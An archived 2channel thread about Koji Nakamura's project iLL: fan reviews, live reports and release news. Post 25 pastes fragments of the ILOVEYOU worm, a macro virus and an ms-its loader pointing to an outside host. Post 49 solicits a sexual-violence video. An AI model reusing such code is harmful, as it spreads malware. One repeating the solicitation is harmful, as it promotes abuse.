2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ナカコー】iLL【スーパーカー】

1 :NO MUSIC NO NAME:2006/06/04(日) 17:30:57 ID:wzY+L+Y8
スレないんで立てました。

オフィシャル
http://www.illtheworld.jp/


2 :NO MUSIC NO NAME:2006/06/04(日) 20:55:45 ID:ZNWblPJU
2げt


3 :NO MUSIC NO NAME:2006/06/04(日) 22:43:16 ID:QRwUDLxX
でも、伸びないね。
スパカスレでいいんじゃない?

4 :NO MUSIC NO NAME:2006/06/05(月) 19:53:57 ID:4oK24GgS
新婦聞いたがいまいちで残念だったな、、、、
サンプリングヴォイスはいらないな、BGMにもならなそう、、、
CORNELIUS>>>>>>>iLL>>>>>>>>>aM
でもイベントでDJに混じってやるならありかもね。
RAWLIFEとかでそうだよな
ただ家では聞くきしねぇぇぇぇぇぇぇぇぇぇぇぇ

5 :NO MUSIC NO NAME:2006/06/06(火) 10:34:49 ID:PnXALkk5
俺はまあ好きだけどね
本人も言ってるように、ビートやリズム、小節という概念を壊して作ったものが多いから、
ノリにくいのは確かだけど、そういう聴き方をしなければなかなかだと思う
気持ちいいよ
でもやっぱり、映像とのコラボ作品じゃないとそれほど聴く気にならない
ナカコーが「映像を音に置き換えた」とか言ってるけど、
ナカコーと同じ映像が見える訳ではないので、やっぱり感じるものは本人よりも弱くなる
歌がないにしても、軸となるメロディが欲しかったのが正直なところ

6 :NO MUSIC NO NAME:2006/06/06(火) 20:33:44 ID:cf1keyqx
マイクロオfヒスのライブみたひといる?CDみたいな感じなのか?
だとしたらUNITでも棒立ちしてそうな悪寒、、、、

7 :NO MUSIC NO NAME:2006/06/06(火) 21:02:07 ID:rmka56qQ
PVキモくて見れない・・・・
漏れチョウチョ恐怖症なんだよ

8 :NO MUSIC NO NAME:2006/06/06(火) 22:16:15 ID:cf1keyqx
新作聞いた、思い浮かんだのが露骨キット

9 :NO MUSIC NO NAME:2006/06/09(金) 03:37:26 ID:Q0VjQgNz
おう、もう出てんだ?
今度視聴してこよう

10 :NO MUSIC NO NAME:2006/06/12(月) 13:05:36 ID:8V6USLdz
スペシャにゲストで出てた
ゴーイングでぶの番組
ナカコやる気なくて恐かった

11 :NO MUSIC NO NAME:2006/06/18(日) 19:39:32 ID:O251E5cF
見よう見まねで「ダンスミュージック」やっても
ダンスミュージック好きには、そんな手の内の透けている音は
全く受け入れられないだろう。
UNITでも完全に無視されてたしな。

誰でも参入できるような、そんなに甘いジャンルじゃない。
というのがよくわかったので俺的には収穫。

ただキツいだろうな今後は。

12 :NO MUSIC NO NAME:2006/06/19(月) 22:51:33 ID:kO1K0cal
>>11
ダンスミュージックじゃねーよw

13 :NO MUSIC NO NAME:2006/06/21(水) 13:09:05 ID:dPXtv3Lj
>>11 UNITどうだったの?ラメルジーとシローザグッドマン目当てで行こうかと思ったけど

14 :NO MUSIC NO NAME:2006/06/24(土) 00:11:53 ID:bheHSJYE
ラメルジーすごく良かったですよ。すごくデカイ人でしたよ。
衣装チェンジがありましたよ。きっと素顔は可愛いんでしょうね。

illも良かったですよ。ダンスミュージックじゃないし。
「人間の証明」とか最高でしたよ。

15 :NO MUSIC NO NAME:2006/06/24(土) 11:41:39 ID:08/gPx/X
>>14
人間の証明kwsk

16 :NO MUSIC NO NAME:2006/06/26(月) 04:32:55 ID:pczMk+WO
歌ものだったらかなり良かった気がするな
音自体は悪くないのにインストになりきれてない

17 :NO MUSIC NO NAME:2006/06/26(月) 18:51:54 ID:ESNhhsNn
ミキライブに居た。

18 :NO MUSIC NO NAME:2006/06/26(月) 21:12:34 ID:IeWh1biM
sound by iLL、zipでうpしてもらおうか(´・ω・`)

19 :NO MUSIC NO NAME:2006/07/04(火) 17:08:06 ID:y+exyMOl
コーダイが降臨した昨夜

20 :NO MUSIC NO NAME:2006/07/04(火) 22:14:57 ID:4y447e+d
illの格好良さ誰もわかってねーな。
がっかりだ。
玄人向けなのか、、、。

21 :大村君:2006/07/05(水) 06:59:12 ID:3+fzLulC
illの今回の作品は、映像音楽的な要素があるとおもうんですが、、、。
コラージュばりばりだし、、、。白人hiphopみたいな。illはhiphopじゃないけど。
3曲目超好き。ダブ要素あるじぇ!
コールドカットの最新アルバムも超かっちょいいよ。


22 :NO MUSIC NO NAME:2006/07/05(水) 21:50:51 ID:gTrbhSpj
(i)

23 :大村君:2006/07/06(木) 05:41:31 ID:iEEOu9hJ
(愛)

24 :大村君:2006/07/06(木) 05:54:14 ID:iEEOu9hJ
相当好きな人みたいにみえるかもしれないが、
また家でillを聴いていたが、どうしたらこんなアレンジが思いつくのか!
ぶっ飛んでますねー、なかむらさん。
なかむらさーん!突っ走ってくださいね!

このスレ落ち着くー。

25 :NO MUSIC NO NAME:2006/07/07(金) 17:51:28 ID:h4EDBciD
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

26 :NO MUSIC NO NAME:2006/07/20(木) 00:56:57 ID:vh1X6/RR
>>25
いい加減止めたら?
コピペしまくってるけどそのスクリプト、間違えてるから・・・w

面白がってても、効果が発動しないスクリプトを貼り付けてるって。。プゲラ


































まぁ、つまりは夏休みがヒントって事?!



27 :NO MUSIC NO NAME:2006/07/21(金) 00:24:21 ID:ErCJSHHP
ぶっとんだ構成とか、やっぱりナカコーのセンスすげえなあって思うけど
本音としては彼の作った「歌」も聴きたい…

28 :NO MUSIC NO NAME:2006/07/23(日) 01:13:23 ID:KW1cJP4H
確かに歌もの聴きたい。でも、気長に待ってればそのうち歌いそぢゃない。

29 :NO MUSIC NO NAME:2006/07/23(日) 21:58:47 ID:XnA4Gnoa
SIG-ILL

30 :NO MUSIC NO NAME:2006/07/25(火) 17:12:15 ID:lfb+FP99
iLLってクソすぎる。薄っぺらい
誰かの真似事をしてるようにしか聴こえない

31 :NO MUSIC NO NAME:2006/07/27(木) 11:17:32 ID:PEr5T2qW
sig-ill

32 :NO MUSIC NO NAME:2006/09/08(金) 18:34:41 ID:sl12iMF7
Super Flat

33 :ナカコー:2006/09/12(火) 12:15:51 ID:3a9jZJ5/
ヤンと見た、

34 :NO MUSIC NO NAME:2006/09/21(木) 02:19:41 ID:mapOQEoq
ナカコー降臨!!













とか一応言ってみたけれどもww
とてもまったりとしたスレですねww
過疎区乙

35 :NO MUSIC NO NAME:2006/09/21(木) 22:33:10 ID:I1y+zEP1
sugeeeeeeeeeeee
nobineeeeeeeeeeeeeeeeee

36 :NO MUSIC NO NAME:2006/09/28(木) 04:00:54 ID:tBOfowI+
ナカコ-、Happy birthday death!!!

37 :NO MUSIC NO NAME:2006/10/01(日) 18:12:40 ID:PJsYnaj1
iLLすごいなあ。
supercarは同時代の音楽のコピーアンドペースト。
iLLでナカコー氏は自分の声を手にしたんじゃないかしら?
自由奔放な音で楽しい。

38 :NO MUSIC NO NAME:2006/10/10(火) 20:04:48 ID:ahgabsPq


39 :NO MUSIC NO NAME:2006/10/12(木) 18:33:59 ID:pTwNVogq
ライブやんのな

40 :NO MUSIC NO NAME:2006/10/14(土) 14:29:41 ID:Yp5/0UNU
ライブいくのな?

41 :NO MUSIC NO NAME:2006/10/28(土) 15:29:37 ID:Bl2+8ioe
音もセンスも悪くないと思うけどインストは微妙だし、
同じくソロは微妙なミキと組んだら?まだ続いてるんでしょ?

42 :NO MUSIC NO NAME:2006/10/29(日) 03:42:49 ID:oEsXhIr9
来春発売のライヴDVD楽しみ!!

43 :NO MUSIC NO NAME:2006/10/29(日) 11:46:44 ID:zlxI/rxW
nyantoraって聞いてないんだがどうなんだ?
スパカ時代に作ってるから、買ってみようと思うんだが。

44 :NO MUSIC NO NAME:2006/11/17(金) 17:20:36 ID:/wxULF7j
エラ張りなで肩ヒラメ面チビって事で。

45 :NO MUSIC NO NAME:2006/11/20(月) 14:36:05 ID:kFxWhx6y
ライヴ、バンド形式だし、ナカコーが歌うね
バンドメンバーも凄いし、楽しみすぎる

46 :NO MUSIC NO NAME:2006/11/20(月) 15:10:07 ID:+0vHptUV
うそっ、まじに歌うの?!

47 :NO MUSIC NO NAME:2006/11/21(火) 02:49:02 ID:wfjfnL5C
ナカコ-が歌ってくれるなら、あの歌声がも一度聴けるなら観に行きたい。

48 :NO MUSIC NO NAME:2006/11/25(土) 02:16:34 ID:qqC3MPQF
こいつのコラムで
「最近、音楽雑誌を見る機会が多くて気分は最悪だ」
ってのがあったと思うんだけどもしかして消されてる?

49 :NO MUSIC NO NAME:2006/12/02(土) 13:54:15 ID:raXo9AZa
どこかで見たんですが、嫌がり泣き叫ぶ女の
マソコに虫を無理矢理たくさん入れてる動画があったのですが、
誰か下さいませんか?

すんごく衝撃的で、自分でも信じられないくらい興奮して、
2、3発平気で抜けたのですが、どこにあるのか忘れてしまいました。

50 :NO MUSIC NO NAME:2006/12/20(水) 00:55:27 ID:669lcWrV
明日、ILL行って来る。

51 :NO MUSIC NO NAME:2006/12/20(水) 02:45:47 ID:kezS4VeL
いってら ノ
乾燥よろしく

52 :NO MUSIC NO NAME:2006/12/20(水) 07:52:53 ID:K9m0o1nR
ヲレも眺めに行って来る

53 :NO MUSIC NO NAME:2006/12/20(水) 23:56:52 ID:u9jhA3aK
眺めてきた。まー、作ってる方は楽しいのかな。
mxiroofficeとか、本気で面白い?

54 :NO MUSIC NO NAME:2006/12/21(木) 00:26:12 ID:obRi8/DD
詳しく、、、

55 :NO MUSIC NO NAME:2006/12/21(木) 00:59:16 ID:XbhKySBO
入場時に配布されたライブのマニュアルに書いてあったセットリスト

1.The World
2.The world2
3.Telepathy
4.ATOm
5.Hal Program
6.flying sausor
7.Summer festival 97
8.Time paradox
9.Ghost!

上記マニュアル、フライヤー、ミラーボール、3Dメガネが配られた。
ライブ中はメガネかけっぱなしでバンドのバックに投影された映像が3Dで見えるという演出。
あと、事前に指定メアドに空メール送ると着メロ(YUMEGIWAだった)がダウンロードできるURLが
書かれたメールが送られてくるというのもあった。
客のノリはイマイチだったが個人的にはかなり良かった。特にラストのGhost!。
DVDでたら買うと思う。

56 :NO MUSIC NO NAME:2006/12/21(木) 01:21:48 ID:NKb9cwho
ミラーボールってどんなん?
てか着メロ、スパカのかいな

57 :NO MUSIC NO NAME:2006/12/21(木) 01:27:48 ID:XbhKySBO
>>56
手のひらに収まるくらいの大きさでストラップがついてる。
てっきりこれを使った演出があるのかなと思ってたけど、
ラストまで手にぶら下げたまま終わった。
ていうか、俺が気がつかなかっただけ?

58 :NO MUSIC NO NAME:2006/12/21(木) 09:40:06 ID:GV+pAmEX
内心、( ゚д゚) な客多かった気がする。
個人的にはかなり楽しめなかった。
iLLって言葉そのまま。
何かの実験みたいな気がしたよ。

3Dもスクリーンセーバー眺めてるようだったし、
これはどう楽しめばよいか僕には難しすぎ。
宇川わからね。

これ、無理な人はどうあがいても無理じゃね?
DVDどころか、CDもあまり聴かないと思う...

59 :NO MUSIC NO NAME:2006/12/21(木) 16:32:19 ID:spXoslRu
iLLってさ、宇川のヒステリーっーか、オナニーなの?
色々な人が記事を書く(〜のかなぁ?)と思うけど、
読んでみたいから、見つけたら教えてポ。

60 :NO MUSIC NO NAME:2006/12/21(木) 19:26:15 ID:J7dIw0Iy
iLLはナカコのスパカの雰囲気をぶっ壊そうというプロジェクトなのか?
とも思った。もしそうだったとしても、つき合わされたならウンザリ。
来る客層は読めるハズだしさ。
勝井目当ての人はどう思ったんかな。

61 :NO MUSIC NO NAME:2006/12/22(金) 03:40:45 ID:MJXjXwnV
何か昨日のライブ評判良くないみたいだけど自分的には悪くなかったよ。まぁ、SUPERCARには勝てないけどさ。ナカコ-、ギタ-弾きながら歌ってくれたし。勝井さんのバイオリンかっこよかった。

62 :NO MUSIC NO NAME:2006/12/28(木) 18:00:40 ID:52a6oU+X
iLL+勝井祐二名義で最新アルバム『Dawn〜夜明け』が2月21日に発売
これは楽しみだ

63 :NO MUSIC NO NAME:2006/12/28(木) 18:16:27 ID:xkPYqkfL
きたな
歌ものはあるの?

64 :NO MUSIC NO NAME:2006/12/29(金) 05:40:17 ID:NLwiBUl3
http://www.bounce.com/news/daily.php/9511/headlineclick
曲数2曲みたいです

65 :NO MUSIC NO NAME:2007/01/01(月) 05:19:45 ID:Z79aJeLT
ジャポンで見てきた。
人力ソーサークソカッコよかった。
いつもはバンドじゃないのよね?
Ghost!って曲は音源売ってるの??

66 :NO MUSIC NO NAME:2007/01/02(火) 19:32:57 ID:8e9wvO3j
富士で勝井とやったときはどんな感じでしたの?
次のライブ行くか迷ってる

67 :NO MUSIC NO NAME:2007/01/12(金) 02:49:42 ID:WG7uKzIA
ageます

68 :NO MUSIC NO NAME:2007/01/14(日) 13:18:01 ID:wBKIHcJB
28日の国立美術館行く人いないの?


69 :NO MUSIC NO NAME:2007/01/14(日) 22:04:08 ID:0wdXEJOu
残りわずか

70 :NO MUSIC NO NAME:2007/01/15(月) 04:30:29 ID:mB6bB+cZ
>>68 >>69
じゃ、やめよ・・・

71 :NO MUSIC NO NAME:2007/01/19(金) 01:27:27 ID:3xNt9si/
勝井とやるときってバンドじゃないんしょ?

72 :NO MUSIC NO NAME:2007/01/19(金) 02:47:01 ID:eVdiuG0C
ナカコーが勝井さんのバイオリンの音をまねして歌うみたいなだったらいいのに

73 :NO MUSIC NO NAME:2007/01/22(月) 02:48:14 ID:P07kYWBO
勝井さんのバイオリンをマネして歌うってw もう終わっちゃったけど、ワンナイ内 ぐっさんのコント思い出してしまったwww

74 :NO MUSIC NO NAME:2007/01/31(水) 15:34:24 ID:nFXMyKxR
新作、物凄く楽しみなんだけど

iLL好きな人ってあんまいないのかな
肯定的な意見があまりにも少なすぎる

確かにナカコーの歌もいいけど、iLLにはまた別のベクトルでの良さがあると感じるんだけどなー

75 :NO MUSIC NO NAME:2007/02/01(木) 12:30:13 ID:F54tbas3
ロキノンは結局雑誌でもてはやされてるだけで実力がないんだよね
iLLってただのオナニー、自己満足じゃんw
エロビデオ会社に自分の音楽使ってって売り込みにいけば?

76 :NO MUSIC NO NAME:2007/02/01(木) 14:08:03 ID:IvpsYeKZ
iLLの実験的且つ斬新のアイディアを兼ねて作られた音楽はとても自分に合う

ほんと中村弘二は奇才だな

77 :NO MUSIC NO NAME:2007/02/01(木) 18:33:58 ID:iiTA/PlC
余計な演出が多くて印象に残らない。
VJもイラネって感じだったが。
オナニーに口だしてもしょうがないんだが。

78 :NO MUSIC NO NAME:2007/02/02(金) 00:42:58 ID:ek1N2x7t
ナカコーがこのテの音楽を、作ってくのはまだ早いってことなんだと思うな。
40代くらいだったら解るけど…。

79 :NO MUSIC NO NAME:2007/02/02(金) 02:25:42 ID:NWaD9MZP
スーパーカーの音楽性はアルバムを出すごとに変化して行った
それで、リスナーの音楽性も広がっていった
それはとても良いことだと思う
しかしその流れの中には、スーパーカーはロックだという前提があった

しかしiLLでやっている音楽はロックではないので、
ほとんどのスーパーカーファンはついていけなくなったのではないか?
多分批判している人の多くはロック専門リスナーな気がする
ロックじゃないにしても、リズムのはっきりしたダンスミュージックとか
今までのファンを引き連れていきたいのなら、もっと徐々にロックから離れていくべきであり、
急激な音楽性の変化は無理があると思う
でも別に今までのファンがどうのこうのとか考えていないと思うので、新たなリスナー層が欲しかったのかな?
いや、単に自分のやりたいことをし出しただけか
まぁ、何はともあれ、頑張って欲しい
iLLの音楽は素晴らしい
正直ヤラレタ

雑文失礼

80 :NO MUSIC NO NAME:2007/02/02(金) 04:04:00 ID:rlWTWvO0
このまえ、生で見たけど、ショーみたいな気がした。
誰が一番この音というか演出をやりたいのかな?ナカコ?宇川?

これは、オナニなの?実験なの?スパカ脱却かなんかの禊?
実験だとしたら、どんな反応ならOKなのかな?
オナニなら、満足しているのかな?
・・・なんて思った。

素晴らしいモノなのかもしれないけど、
今後も聴きたいかといえば、聴かないかな・・・。
無理してよくわからない芸術を追う気もない。

81 :NO MUSIC NO NAME:2007/02/02(金) 13:45:19 ID:sK5wqxzH
自分はSSTVでFLYING SAUCERのライヴ観て、こりゃ良い!と思ったけどなぁ…。意外と歌ってたし。

82 :NO MUSIC NO NAME:2007/02/02(金) 17:54:02 ID:UTksJ3Ka
my spaceにこういう音楽やってる人ゴロゴロいるじゃん
この人はロキノンで持ち上げられて、オレって天才って思われたいんだろう

83 :NO MUSIC NO NAME:2007/02/03(土) 02:33:02 ID:sGygYLX0
4月4日にライヴDVD発売されるね

>>82
ゴロゴロいるなら教えてくれ

84 :NO MUSIC NO NAME:2007/02/04(日) 06:34:54 ID:BYR6Z+RR
>>83
まあまあ。
アルバムはつまんなかったよ

85 :NO MUSIC NO NAME:2007/02/07(水) 00:03:01 ID:g6uqm3Pf
初回についてるDVDはどうだったん?

86 :NO MUSIC NO NAME:2007/02/08(木) 17:24:42 ID:EfDc0AD3
>>85
なかなか良かったよ

87 :NO MUSIC NO NAME:2007/02/08(木) 23:44:35 ID:gfqgAaDk
>>86
買ってみたけど俺は駄目かもorz

逆にCDはツボなんだけどな…

88 :NO MUSIC NO NAME:2007/02/10(土) 06:49:19 ID:osk3rLQt
見たけど、『iLL』って言葉そのまんまだねー。
ストイックにキモイ演出と音を出している気がするから、
まぁ、キモクて当たり前だわ・・・としか言いようがない感じなんだけど。
「ぼくは気分が悪いんだー、鬱だー」ってとらえていいのかな?

89 :NO MUSIC NO NAME:2007/02/10(土) 23:20:58 ID:W+qe8ehM
去年12月のライブがdvdで出るんでしょ?
どうなん?

90 :NO MUSIC NO NAME:2007/02/11(日) 20:23:41 ID:R+mkiUNU
1stで鬱ってキモイ曲やっといて
次でちょっとわかりやすい曲やって
ロキノンの低脳ライターが「化けた」と提灯記事書いて
それ読んだアホがCD買う 今後はそんな予定です


91 :NO MUSIC NO NAME:2007/02/12(月) 01:57:13 ID:xgscGPWg
>>90
あ、それ俺も思った。
最後はVJやら演出を含めた総合アートだったんです、
なカンジに流して、静かに消えそう。

レコ発(ゲスト:大野由美子bd)もあるみたいだけど、
演出過多なカンジ、これまた重い気がする・・・iLL。
行く人レポヨロ。

92 :NO MUSIC NO NAME:2007/02/12(月) 03:31:11 ID:iuC8cM1G
このスレ、過疎り過ぎていつかなくなると思ってたけど なんだかんだいって最近のびてるね。

93 :NO MUSIC NO NAME:2007/02/12(月) 19:30:12 ID:jbn/Hg9y
最近活気づいてきたなw
ナカコーにはいろいろと期待してるから応えて欲しい

94 :NO MUSIC NO NAME:2007/02/12(月) 20:53:01 ID:EHy4s+lt


95 :NO MUSIC NO NAME:2007/02/12(月) 23:29:12 ID:xvJ3KJ4P
ナギサオンガクサイとかに出ればいいのに。

20 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)